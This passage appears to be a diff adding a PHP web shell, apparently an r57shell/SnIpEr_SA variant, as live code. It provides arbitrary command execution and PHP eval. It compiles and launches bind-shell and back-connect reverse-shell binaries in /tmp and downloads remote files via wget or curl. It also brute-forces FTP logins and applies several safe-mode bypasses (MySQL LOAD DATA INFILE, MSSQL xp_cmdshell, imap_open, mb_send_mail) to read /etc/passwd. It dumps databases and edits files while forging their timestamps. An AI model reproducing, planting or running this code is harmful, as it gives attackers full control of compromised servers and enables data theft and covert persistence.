+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else
+  {
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+     @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+     @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text302'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
